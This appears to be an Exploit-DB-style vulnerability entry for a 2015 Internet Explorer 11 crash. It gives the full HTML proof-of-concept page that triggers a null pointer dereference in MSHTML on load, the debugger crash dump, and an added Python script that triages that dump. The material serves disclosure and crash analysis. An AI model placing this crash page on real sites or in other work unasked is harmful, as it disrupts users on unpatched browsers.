Vendor: Internet Explorer
By: Pawel Wylecial
CVSS: 7.5 HIGH
Crash PoC
CWE: 119
Product Name: Internet Explorer
Affected Version From: 11.0.9600.17801
Affected Version To: 11.0.9600.17801
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:internet_explorer:11.0.9600.17801
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7/8.1
2015

Microsoft Internet Explorer 11 Crash PoC

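This is a proof of concept for a crash vulnerability in Microsoft Internet Explorer 11. The page creates a div element, appends it to the document body, sets its outerHTML to 'AAAA', and then calls msGetInputContext() on the same element reference. This causes an access violation in MSHTML!Tree::ElementNode::GetCElement. The debugger output at the end of the PoC shows the faulting instruction reading from address 00000008 with ecx=00000000, which is a null pointer dereference.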

Mitigation:

Microsoft has released a patch for this vulnerability.

Exploit-DB raw data:

<!--
# Exploit title: Microsoft Internet Explorer 11 Crash PoC
# Date: 07.06.2015
# Vulnerable version: 11 (newest at the time 11.0.9600.17801)
# Tested on: Windows 7/8.1
# Author: Pawel Wylecial
# http://howl.overflow.pl @h0wlu
-->
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
        var divA = document.createElement("div");
        document.body.appendChild(divA);

        try {
                //divA.contentEditable = "true";
                divA.outerHTML = "AAAA";
                var context = divA['msGetInputContext']();
        }
        catch (exception) {
        }
}
</script>
</head>
<body onload='boom();'>
</body>
</html>
<!--
(2534.480c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98
eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000  test    dword ptr [ecx+8],100000h ds:002b:00000008=????????
-->
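
Added example (not part of the original PoC or the Exploit-DB entry): a Python triage script that parses the debugger output quoted in the PoC's trailing comment, recomputes the faulting address from the register dump, and classifies the fault as a null pointer dereference. The function names and the 64 KiB null-page threshold are assumptions of this example.

```python
import re

# Debugger output copied verbatim from the PoC's trailing comment on this page.
WINDBG_OUTPUT = """\
(2534.480c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98
eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000  test    dword ptr [ecx+8],100000h ds:002b:00000008=????????
"""

# Assumption of this example: addresses in the lowest 64 KiB count as the null page.
NULL_PAGE_LIMIT = 0x10000

def parse_registers(text):
    """Return {register: value} for every 32-bit reg=value pair in the dump."""
    return {m.group(1): int(m.group(2), 16)
            for m in re.finditer(r"\b(e[a-z]{2})=([0-9a-f]{8})\b", text)}

def triage(text):
    """Recompute the faulting address and decide whether it is a null dereference."""
    regs = parse_registers(text)
    symbol = re.search(r"^(\S+!\S+):$", text, re.M)
    # Memory operand of the faulting instruction, e.g. [ecx+8] (displacement is hex).
    operand = re.search(r"\[(e[a-z]{2})(?:([+-])([0-9a-f]+)h?)?\]", text, re.I)
    if operand is None:
        raise ValueError("no register-based memory operand found")
    # Effective address as printed by the debugger, e.g. ds:002b:00000008=
    shown = re.search(r"\b[a-z]s:[0-9a-f]{4}:([0-9a-f]{8})=", text)
    base = operand.group(1).lower()
    disp = int(operand.group(3) or "0", 16)
    if operand.group(2) == "-":
        disp = -disp
    address = (regs[base] + disp) & 0xFFFFFFFF
    return {
        "symbol": symbol.group(1) if symbol else None,
        "base_register": base,
        "address": address,
        "matches_debugger": shown is not None and int(shown.group(1), 16) == address,
        "null_dereference": regs[base] == 0 and address < NULL_PAGE_LIMIT,
    }

if __name__ == "__main__":
    for key, value in triage(WINDBG_OUTPUT).items():
        print(f"{key}: {value}")
```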